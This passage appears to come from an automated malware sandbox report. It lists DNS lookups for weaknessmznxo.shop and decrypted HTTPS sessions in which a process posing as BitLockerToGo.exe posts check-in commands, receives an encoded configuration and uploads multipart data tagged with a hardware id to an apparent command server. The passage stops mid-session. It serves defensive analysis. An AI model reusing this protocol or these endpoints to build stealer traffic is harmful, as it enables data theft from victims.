Jul 26, 2024 20:34:03.300448895 CEST	192.168.2.4	1.1.1.1	0x1d29	Standard query (0)	weaknessmznxo.shop	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:34:36.743046045 CEST	192.168.2.4	1.1.1.1	0x6bb1	Standard query (0)	18.31.95.13.in-addr.arpa	PTR (Pointer record)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jul 26, 2024 20:34:03.317682981 CEST	1.1.1.1	192.168.2.4	0x1d29	No error (0)	weaknessmznxo.shop		172.67.159.243	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:34:03.317682981 CEST	1.1.1.1	192.168.2.4	0x1d29	No error (0)	weaknessmznxo.shop		104.21.41.43	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:34:36.751231909 CEST	1.1.1.1	192.168.2.4	0x6bb1	Name error (3)	18.31.95.13.in-addr.arpa	none	none	PTR (Pointer record)	IN (0x0001)	false

HTTP Request Dependency Graph

weaknessmznxo.shop

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49731	172.67.159.243	443	7056	C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-26 18:34:03 UTC	265	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: weaknessmznxo.shop
2024-07-26 18:34:03 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-07-26 18:34:04 UTC	808	IN	HTTP/1.1 200 OK Date: Fri, 26 Jul 2024 18:34:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=jb605ih35as0gg9u4g9midshm1; expires=Tue, 19-Nov-2024 12:20:43 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DOWBDzqTIya8AbHYOK0Qq8qr%2BELKrax4IG8PGYPZUyA5lSFORrEkzq24i6Yc5C8JJNCAixDf7pYzHxk0vUZVescWAdmH%2FyZ65DOrig%2Bb9aROSHJ9qOVOb7AKj2K%2F3q%2B6P5%2BpVH4%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8a967b4ebb521839-EWR alt-svc: h3=":443"; ma=86400
2024-07-26 18:34:04 UTC	7	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
2024-07-26 18:34:04 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49732	172.67.159.243	443	7056	C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-26 18:34:04 UTC	266	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 52 Host: weaknessmznxo.shop
2024-07-26 18:34:04 UTC	52	OUT	Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4c 50 6e 68 71 6f 2d 2d 40 6b 6f 6c 6e 61 75 73 67 62 26 6a 3d Data Ascii: act=recive_message&ver=4.0&lid=LPnhqo--@kolnausgb&j=
2024-07-26 18:34:05 UTC	802	IN	HTTP/1.1 200 OK Date: Fri, 26 Jul 2024 18:34:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=7silta19o5ehen2q64b1p8i0b2; expires=Tue, 19-Nov-2024 12:20:44 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LgWdj5ItcwWxaxbD1rjp%2BEqJf9ITb832N9GV10IopX39BITKsv67f3hVVDEHQFhXcXT8kcZqy9FrdhyFPL7TF4g2NURG8%2BHRvUetz9jhLipnkv4RXe2cvmPqwqP507k%2BYri23bE%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8a967b556c908c9b-EWR alt-svc: h3=":443"; ma=86400
2024-07-26 18:34:05 UTC	567	IN	Data Raw: 31 64 61 65 0d 0a 7a 65 54 31 4b 42 57 37 69 6f 4a 61 36 31 33 79 7a 4b 52 44 73 63 62 59 5a 39 4c 39 51 36 4f 76 78 4a 4f 67 5a 39 57 69 6b 52 43 32 78 6f 4d 4b 4c 34 2b 6d 6f 43 6d 4f 66 38 69 34 31 6a 62 55 36 76 6f 47 74 74 39 35 78 63 36 6f 34 4d 56 4c 39 39 54 38 4d 76 65 43 6c 45 52 6d 33 71 61 67 50 35 4e 2f 79 4a 66 66 59 64 53 6f 2b 6c 33 77 6d 43 6e 42 7a 71 6a 78 77 51 79 36 30 76 31 7a 70 59 69 53 51 48 44 59 37 75 4d 32 68 6a 69 58 71 63 55 70 33 36 2b 31 44 37 2f 66 62 34 48 4b 76 72 47 61 52 5a 6a 48 35 58 47 41 68 59 5a 44 4e 38 61 6d 2b 58 69 4f 4d 39 44 32 68 69 4c 55 70 4c 51 42 74 70 59 72 79 38 65 67 38 4d 51 4e 70 63 76 33 65 4b 57 47 6b 55 46 36 30 66 72 75 50 49 45 7a 6b 61 50 46 59 5a 33 6b 76 52 33 77 78 32 47 53 2f 36 58 67 30 Data Ascii: 1daezeT1KBW7ioJa613yzKRDscbYZ9L9Q6OvxJOgZ9WikRC2xoMKL4+moCmOf8i41jbU6voGtt95xc6o4MVL99T8MveClERm3qagP5N/yJffYdSo+l3wmCnBzqjxwQy60v1zpYiSQHDY7uM2hjiXqcUp36+1D7/fb4HKvrGaRZjH5XGAhYZDN8am+XiOM9D2hiLUpLQBtpYry8eg8MQNpcv3eKWGkUF60fruPIEzkaPFYZ3kvR3wx2GS/6Xg0
2024-07-26 18:34:05 UTC	1369	IN	Data Raw: 64 66 76 39 6e 69 57 63 59 6e 75 77 53 32 54 2f 50 6f 4c 74 5a 41 7a 77 4e 2b 6a 2f 39 41 4a 73 73 62 2b 63 61 47 47 6b 6b 31 36 31 2b 37 6e 4f 34 45 37 6b 61 44 4b 4b 39 43 67 75 55 58 2b 33 79 62 5a 6a 66 36 78 38 77 61 7a 78 2b 46 78 6f 63 61 49 42 47 36 5a 37 2b 78 34 30 58 2b 61 71 4d 73 6f 32 4b 4f 79 43 61 4b 55 4c 73 4c 45 6f 66 66 49 42 72 2f 4b 39 58 79 75 67 5a 4a 4e 5a 64 66 6a 37 54 75 44 4f 64 44 67 68 69 62 4c 35 4f 4a 46 6e 70 77 77 31 2f 2b 6c 34 4e 4e 46 71 49 37 71 4d 71 69 4b 31 78 49 33 30 4f 44 76 4e 59 51 31 6e 71 76 4c 4b 4e 4b 6c 74 77 4f 37 6e 69 6e 4a 79 61 48 78 78 67 69 34 7a 76 4e 38 70 34 4f 54 51 48 36 5a 70 71 41 2f 6b 58 2f 49 37 76 59 73 33 36 2b 32 52 34 57 63 4c 38 2f 4b 73 4c 48 64 53 36 36 41 39 48 37 76 33 74 64 59 Data Ascii: dfv9niWcYnuwS2T/PoLtZAzwN+j/9AJssb+caGGkk161+7nO4E7kaDKK9CguUX+3ybZjf6x8wazx+FxocaIBG6Z7+x40X+aqMso2KOyCaKULsLEoffIBr/K9XyugZJNZdfj7TuDOdDghibL5OJFnpww1/+l4NNFqI7qMqiK1xI30ODvNYQ1nqvLKNKltwO7ninJyaHxxgi4zvN8p4OTQH6ZpqA/kX/I7vYs36+2R4WcL8/KsLHdS66A9H7v3tdY
2024-07-26 18:34:05 UTC	1369	IN	Data Raw: 51 2f 69 48 2f 65 37 73 45 35 6b 2f 7a 36 4d 36 43 53 4c 65 2f 47 71 76 69 43 47 76 6e 5a 73 33 57 6a 78 73 38 4b 63 39 58 67 36 6a 65 41 4e 5a 71 68 7a 79 48 62 72 62 4d 47 73 4a 4d 6e 77 4d 47 71 2f 4d 63 47 73 73 33 32 63 71 4f 42 6b 45 73 33 6c 36 6a 6e 49 4d 6c 6e 30 4a 37 4c 4c 64 69 6f 2b 44 43 7a 6b 53 2f 47 32 2b 62 75 6a 42 7a 33 78 2f 38 79 39 38 61 59 53 33 72 54 34 2b 34 30 69 44 2b 55 72 63 77 68 33 4b 47 38 44 62 6d 66 4d 38 62 43 70 2f 44 4a 44 72 72 4f 39 6e 4f 71 67 64 63 45 4e 39 37 77 6f 47 44 4a 45 72 6d 55 68 6a 36 64 76 66 6f 43 76 4e 39 35 67 63 6d 73 38 63 38 50 76 4d 2f 77 64 61 47 47 6d 6b 42 6c 30 65 6a 67 4e 6f 38 2b 6e 4b 76 48 4c 64 43 32 74 67 4f 39 6d 53 6e 54 6a 65 69 78 78 52 33 33 6d 4c 4e 53 70 49 71 55 52 6e 62 65 71 Data Ascii: Q/iH/e7sE5k/z6M6CSLe/GqviCGvnZs3Wjxs8Kc9Xg6jeANZqhzyHbrbMGsJMnwMGq/McGss32cqOBkEs3l6jnIMln0J7LLdio+DCzkS/G2+bujBz3x/8y98aYS3rT4+40iD+Urcwh3KG8DbmfM8bCp/DJDrrO9nOqgdcEN97woGDJErmUhj6dvfoCvN95gcms8c8PvM/wdaGGmkBl0ejgNo8+nKvHLdC2tgO9mSnTjeixxR33mLNSpIqURnbeq
2024-07-26 18:34:05 UTC	1369	IN	Data Raw: 77 6d 62 7a 46 4c 64 32 6a 74 41 6d 2b 6b 69 76 43 77 4f 61 2f 67 67 4b 76 67 4b 73 79 67 34 47 61 5a 48 7a 56 37 36 41 6e 78 79 62 51 71 63 70 68 69 2b 53 32 44 37 79 57 49 63 6a 49 72 76 72 4c 41 4c 62 4c 39 6e 47 70 69 35 68 44 5a 64 50 72 37 6a 75 46 4d 35 61 76 78 54 50 62 72 66 70 4c 38 4a 67 35 67 5a 58 6d 30 4d 77 49 6f 38 66 6a 4d 72 44 49 6a 67 70 77 31 61 69 34 65 49 6f 2b 6e 36 33 48 4c 4e 57 74 73 67 57 32 6d 69 37 4d 77 36 48 32 77 67 69 35 7a 2f 56 36 6f 6f 71 63 52 48 37 66 36 4f 45 79 79 58 48 51 71 64 35 68 69 2b 53 4b 42 72 43 66 4f 6f 48 53 36 4f 69 43 41 72 75 41 71 7a 4b 39 6a 4a 35 4b 64 4e 62 76 35 44 4f 46 4f 70 57 68 78 53 6a 57 72 62 51 58 75 5a 45 70 79 63 4b 6a 2b 73 49 49 76 63 7a 7a 63 65 2f 49 31 30 31 76 6d 62 43 67 43 6f Data Ascii: wmbzFLd2jtAm+kivCwOa/ggKvgKsyg4GaZHzV76AnxybQqcphi+S2D7yWIcjIrvrLALbL9nGpi5hDZdPr7juFM5avxTPbrfpL8Jg5gZXm0MwIo8fjMrDIjgpw1ai4eIo+n63HLNWtsgW2mi7Mw6H2wgi5z/V6ooqcRH7f6OEyyXHQqd5hi+SKBrCfOoHS6OiCAruAqzK9jJ5KdNbv5DOFOpWhxSjWrbQXuZEpycKj+sIIvczzce/I101vmbCgCo
2024-07-26 18:34:05 UTC	1369	IN	Data Raw: 77 43 37 61 70 37 6b 4d 74 35 63 74 79 38 36 68 73 59 78 46 73 4e 69 7a 4b 75 2b 6c 67 46 70 36 6d 66 65 75 49 63 6b 34 6e 4f 36 65 59 64 75 70 73 67 2b 30 6d 43 7a 47 79 36 2f 6a 79 77 43 35 77 50 64 35 6f 49 43 54 53 58 66 4c 37 75 51 77 69 6a 4b 64 6f 4d 55 6c 6b 2b 72 36 41 71 6a 66 65 59 48 2f 71 2f 2f 5a 43 72 44 52 2b 54 4b 77 79 49 34 4b 63 4e 57 6f 75 48 69 4e 4d 59 4b 6c 78 79 72 59 71 72 30 4b 74 5a 55 68 7a 73 6d 6c 2f 38 6b 45 74 4d 6a 2b 66 36 47 4d 6e 6b 4e 77 31 65 7a 6e 65 4d 64 2f 6c 37 61 47 65 5a 4f 50 6d 79 69 63 6d 44 75 42 30 75 6a 6f 67 67 4b 37 67 4b 73 79 6f 34 2b 62 51 48 7a 65 34 75 34 78 68 7a 53 43 76 4d 55 6c 30 4b 32 35 41 72 6d 52 49 63 62 49 71 50 62 44 44 72 50 4b 38 48 54 76 79 4e 64 4e 62 35 6d 77 6f 42 53 4b 50 35 32 Data Ascii: wC7ap7kMt5cty86hsYxFsNizKu+lgFp6mfeuIck4nO6eYdupsg+0mCzGy6/jywC5wPd5oICTSXfL7uQwijKdoMUlk+r6AqjfeYH/q//ZCrDR+TKwyI4KcNWouHiNMYKlxyrYqr0KtZUhzsml/8kEtMj+f6GMnkNw1ezneMd/l7aGeZOPmyicmDuB0ujoggK7gKsyo4+bQHze4u4xhzSCvMUl0K25ArmRIcbIqPbDDrPK8HTvyNdNb5mwoBSKP52
2024-07-26 18:34:05 UTC	1369	IN	Data Raw: 61 57 39 44 62 32 4e 49 73 37 43 6f 76 48 4e 41 37 48 42 2f 48 53 6f 6a 35 5a 43 63 4a 6d 6d 6f 44 2b 52 66 38 6a 75 36 43 62 51 6f 50 6f 61 2f 6f 5a 68 78 73 48 6d 71 59 49 46 76 63 72 35 66 4b 2b 42 68 55 78 2b 32 65 76 79 4f 34 38 33 6c 71 4c 4b 4c 4e 75 74 75 67 43 37 6b 69 72 4d 79 36 62 36 77 30 58 35 67 50 52 71 37 39 37 58 65 33 72 58 37 4f 34 37 6d 54 6a 51 73 59 67 34 6b 36 4f 32 52 65 6a 66 4c 73 6a 66 6f 66 54 4b 44 4c 66 4f 2b 6e 75 6f 67 70 52 4c 63 39 58 6e 36 54 75 42 50 70 69 68 78 53 48 59 72 4c 41 45 76 70 70 68 6a 34 32 68 36 59 4a 64 39 2b 2f 77 64 36 53 48 31 57 31 78 33 75 53 67 4a 38 63 6d 30 4b 6e 4b 59 59 76 6b 75 51 47 2b 6c 69 37 46 78 36 48 78 78 51 4f 33 79 50 68 2f 70 4a 53 53 52 48 4c 59 36 4f 45 33 68 54 2b 43 71 38 67 71 Data Ascii: aW9Db2NIs7CovHNA7HB/HSoj5ZCcJmmoD+Rf8ju6CbQoPoa/oZhxsHmqYIFvcr5fK+BhUx+2evyO483lqLKLNutugC7kirMy6b6w0X5gPRq797Xe3rX7O47mTjQsYg4k6O2RejfLsjfofTKDLfO+nuogpRLc9Xn6TuBPpihxSHYrLAEvpphj42h6YJd9+/wd6SH1W1x3uSgJ8cm0KnKYYvkuQG+li7Fx6HxxQO3yPh/pJSSRHLY6OE3hT+Cq8gq
2024-07-26 18:34:05 UTC	194	IN	Data Raw: 75 65 6d 43 66 45 79 72 61 7a 37 41 36 6a 78 37 4d 38 37 34 6e 58 45 6b 36 5a 6f 4b 41 48 78 33 2b 49 37 70 35 68 35 71 65 30 43 37 65 4a 4d 49 7a 6a 6f 66 66 48 41 71 65 43 33 58 6d 37 67 64 63 45 4e 39 2b 6f 75 47 6a 48 66 35 53 2f 68 6e 6d 44 39 75 46 51 34 38 68 78 6b 39 4c 6f 36 49 49 54 39 35 69 68 50 4f 2b 55 31 78 49 33 6e 75 76 79 4b 6f 38 38 68 71 32 42 48 2b 32 6e 72 41 69 2f 6c 43 44 2f 38 34 6a 38 77 77 61 35 67 73 4a 6b 6f 70 61 55 54 33 44 6e 31 75 34 2f 6e 54 69 65 71 4d 5a 68 6e 65 53 31 52 65 69 6d 59 59 6d 4e 6d 62 2b 43 48 66 65 59 73 30 65 73 69 4a 0d 0a Data Ascii: uemCfEyraz7A6jx7M874nXEk6ZoKAHx3+I7p5h5qe0C7eJMIzjoffHAqeC3Xm7gdcEN9+ouGjHf5S/hnmD9uFQ48hxk9Lo6IIT95ihPO+U1xI3nuvyKo88hq2BH+2nrAi/lCD/84j8wwa5gsJkopaUT3Dn1u4/nTieqMZhneS1ReimYYmNmb+CHfeYs0esiJ
2024-07-26 18:34:05 UTC	1369	IN	Data Raw: 32 34 37 32 0d 0a 6c 4e 59 63 69 6c 77 79 36 45 4d 4a 75 76 68 6d 2b 54 6f 76 70 64 34 4e 46 68 78 64 7a 6d 71 5a 4a 58 37 4a 57 67 4a 66 2f 55 69 41 52 75 6d 66 36 67 59 4e 74 78 30 4c 79 47 65 5a 50 6a 74 41 69 78 6e 43 2f 43 33 37 54 33 77 52 4f 30 68 38 31 4d 6a 6f 75 63 52 6e 72 57 34 39 34 47 71 44 4b 62 6f 73 73 75 32 4a 71 45 45 4c 4f 52 4c 38 62 62 74 37 47 4d 52 62 69 41 71 30 76 76 7a 74 64 31 4f 5a 6e 77 6f 47 44 4a 43 70 4f 67 79 43 62 46 74 66 63 6b 76 5a 51 74 7a 4d 4b 74 73 59 78 46 73 59 43 72 49 75 48 47 6b 31 73 33 67 62 69 79 59 39 78 73 78 2f 36 55 50 70 32 39 2b 68 50 77 78 33 4f 50 6a 62 53 78 6d 6b 58 77 77 2b 46 67 71 59 57 42 53 54 44 6e 31 73 4d 76 6e 7a 57 4c 37 4f 41 6d 77 71 32 73 43 4b 4b 68 48 2b 2f 41 70 2f 4c 4d 52 34 62 Data Ascii: 2472lNYcilwy6EMJuvhm+Tovpd4NFhxdzmqZJX7JWgJf/UiARumf6gYNtx0LyGeZPjtAixnC/C37T3wRO0h81MjoucRnrW494GqDKbossu2JqEELORL8bbt7GMRbiAq0vvztd1OZnwoGDJCpOgyCbFtfckvZQtzMKtsYxFsYCrIuHGk1s3gbiyY9xsx/6UPp29+hPwx3OPjbSxmkXww+FgqYWBSTDn1sMvnzWL7OAmwq2sCKKhH+/Ap/LMR4b
2024-07-26 18:34:05 UTC	1369	IN	Data Raw: 39 62 46 45 53 4b 4b 76 37 42 71 6c 6e 47 4a 37 74 42 68 69 2f 62 30 52 61 4c 66 65 59 47 4b 70 65 50 51 41 37 54 57 38 44 57 52 75 4c 46 4a 5a 74 50 4a 37 53 69 4f 41 61 36 37 78 53 2f 64 6f 36 77 55 38 4e 46 68 7a 6f 33 2b 79 49 4a 4e 2b 38 62 77 5a 4f 2b 35 32 51 70 76 6d 62 43 67 44 59 6f 78 6e 71 6e 51 4d 4a 36 43 75 52 53 36 76 69 7a 52 79 75 61 2f 67 67 50 33 6d 4b 41 38 37 34 4b 47 43 69 2b 4a 75 72 74 74 32 6d 6a 41 2f 4e 6c 76 79 75 53 73 52 65 6a 4e 62 34 48 66 35 71 6d 43 51 72 54 53 34 58 53 73 6b 4a 51 4e 53 65 66 64 34 7a 61 48 4f 49 61 62 78 54 44 51 70 4c 45 37 6a 72 34 76 79 73 71 71 35 2f 77 37 67 73 50 39 66 4b 69 51 68 67 6f 35 6d 65 65 67 59 4c 42 2f 32 4f 37 35 62 35 4f 38 2b 6c 33 77 71 69 4c 50 77 36 48 6e 30 30 69 43 77 2b 4a 78 Data Ascii: 9bFESKKv7BqlnGJ7tBhi/b0RaLfeYGKpePQA7TW8DWRuLFJZtPJ7SiOAa67xS/do6wU8NFhzo3+yIJN+8bwZO+52QpvmbCgDYoxnqnQMJ6CuRS6vizRyua/ggP3mKA874KGCi+Jurtt2mjA/NlvyuSsRejNb4Hf5qmCQrTS4XSskJQNSefd4zaHOIabxTDQpLE7jr4vysqq5/w7gsP9fKiQhgo5meegYLB/2O75b5O8+l3wqiLPw6Hn00iCw+Jx

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49733	172.67.159.243	443	7056	C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-26 18:34:06 UTC	284	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 18168 Host: weaknessmznxo.shop
2024-07-26 18:34:06 UTC	15331	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 31 43 38 45 44 31 42 34 44 34 35 42 41 35 41 41 34 44 43 42 34 35 35 38 39 46 41 35 43 46 43 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 50 6e 68 71 6f 2d 2d 40 6b 6f 6c 6e Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"C1C8ED1B4D45BA5AA4DCB45589FA5CFC--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"LPnhqo--@koln
2024-07-26 18:34:06 UTC	2837	OUT	Data Raw: bb b9 8c 98 dd 7e cd 12 32 f5 4d e7 b8 03 4d ad dd 29 81 f2 25 6f 8d 9b f3 9f 07 bb ae 6e c1 f4 74 a0 46 9e dd 44 3a b6 ea f7 8d 77 8c 30 f7 2d 3a 5e 78 e6 d9 84 b0 07 c8 dc 44 8b 5c 37 7b fb ca 23 5f 36 6d 2b c9 df b7 24 a9 bc 70 d3 dd 98 da 4d 16 48 c1 d0 c9 d5 49 13 55 45 68 ed 5e ef aa d6 a5 b6 55 e8 30 13 67 aa 7a 0c 44 f5 2f c0 e3 2b e7 fb 3b 59 90 f0 70 93 c0 3f ee 4c 10 0e bb be eb 3c d7 34 e8 6e cd 74 c5 e2 cb eb 6d db e8 13 05 d7 da ba 6c 95 3d a2 38 f5 d7 4b e3 d4 69 a8 33 83 0e 15 fa 46 ca d1 d5 a4 6f 98 ff ba be f6 4f ec e7 b8 41 b9 35 35 6f df d7 6e b4 81 3d a9 b9 db c0 6c dc 0d bd e3 2e 85 05 bc 3b 82 4b 1b 1e ce 0b 47 dd 7b be cb 51 82 bb d3 d3 f4 36 9c 58 ee 7c 6d cc b2 92 e5 6e b1 c6 c7 5e d9 b7 ac 49 aa b3 55 f5 d2 ec 6d 9e f3 27 aa 33 Data Ascii: ~2MM)%ontFD:w0-:^xD\7{#_6m+$pMHIUEh^U0gzD/+;Yp?L<4ntml=8Ki3FoOA55on=l.;KG{Q6X\|mn^IUm'3
2024-07-26 18:34:06 UTC	806	IN	HTTP/1.1 200 OK Date: Fri, 26 Jul 2024 18:34:06 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=siv7jk31e62jpdm887oacoqkjt; expires=Tue, 19-Nov-2024 12:20:45 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Pkkc%2Fmwk%2FAl0qQIBY%2FvmwHZpyy9vkYWuDdiLg3gseLKFwhiWlCJbQgnGrUCiIKMB9uRp9pTO6OGVjxAS%2BaYgQti0LHQGnAffI%2BO9cwhxGUmoXOZtTpOHqymPX7ihoSAxGlgTxJk%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8a967b5e1cd27cf6-EWR alt-svc: h3=":443"; ma=86400
2024-07-26 18:34:06 UTC	19	IN	Data Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 33 33 0d 0a Data Ascii: eok 8.46.123.33
2024-07-26 18:34:06 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49734	172.67.159.243	443	7056	C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-26 18:34:07 UTC	283	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8789 Host: weaknessmznxo.shop
2024-07-26 18:34:07 UTC	8789	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 31 43 38 45 44 31 42 34 44 34 35 42 41 35 41 41 34 44 43 42 34 35 35 38 39 46 41 35 43 46 43 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 50 6e 68 71 6f 2d 2d 40 6b 6f 6c 6e Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"C1C8ED1B4D45BA5AA4DCB45589FA5CFC--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"LPnhqo--@koln
2024-07-26 18:34:08 UTC	804	IN	HTTP/1.1 200 OK Date: Fri, 26 Jul 2024 18:34:07 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=vmg2r3fceq18u14sr222rj7m4r; expires=Tue, 19-Nov-2024 12:20:46 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FuShXpB9sx%2FV5sOt%2BfKRoKOD0di7dpLwxGQI2vAvp0%2FjYsMtfhflAt1zV5xgUjr94J4i4iFeSWmpg7F4o6S%2BUTQ3a9hUpqMLjacOU5I61WhIiVKfrgCruYDZQd42DnjHqueXAFU%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8a967b658d8143cb-EWR alt-svc: h3=":443"; ma=86400
2024-07-26 18:34:08 UTC	19	IN	Data Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 33 33 0d 0a Data Ascii: eok 8.46.123.33
2024-07-26 18:34:08 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49735	172.67.159.243	443	7056	C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-26 18:34:08 UTC	284	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 20442 Host: weaknessmznxo.shop
